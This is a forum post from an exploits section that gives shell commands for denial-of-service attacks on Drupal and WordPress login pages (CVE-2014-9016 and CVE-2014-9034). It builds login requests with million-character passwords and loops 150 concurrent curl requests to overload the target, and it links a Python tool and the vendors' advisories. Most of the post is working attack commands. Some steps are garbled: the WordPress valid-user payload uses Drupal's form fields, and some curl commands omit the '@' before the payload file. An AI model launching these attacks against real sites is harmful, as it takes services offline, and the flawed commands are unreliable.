Jump to content
devilox

CVE-2014-9016 and CVE-2014-9034 Drupal & Wordpress Denial of Service

By devilox, in Exploituri

Recommended Posts

devilox Newbie

devilox

Posted
Posted (edited)

Drupal Denial of Service CVE-2014-9016

Generate a pyaload and try with a non-valid user:


$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload

$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Generate a pyaload and try with a valid user:


$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data   valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Perform a Dos with a valid user:


$ for i in `seq 1 150`; do (curl --data   valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done

Wordpress Denial of Service CVE-2014-9034

Generate a pyaload and try with a non-valid user:


$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload

$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Generate a pyaload and try with a valid user:


$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data   valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Perform a Dos with a valid user:


$ for i in `seq 1 150`; do (curl --data   valid_user_payload http://yoursite/wordpress/wp-login.php  --silent > /dev/null &); sleep 0.25; done

Python Code

https://github.com/c0r3dump3d/wp_drupal_timing_attack

References

Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep

Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep

Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console

https://wordpress.org/news/2014/11/wordpress-4-0-1/

https://www.drupal.org/SA-CORE-2014-006

https://www.drupal.org/node/2378367

NVD - Detail

NVD - Detail

Source : CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep

Edited by devilox
  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...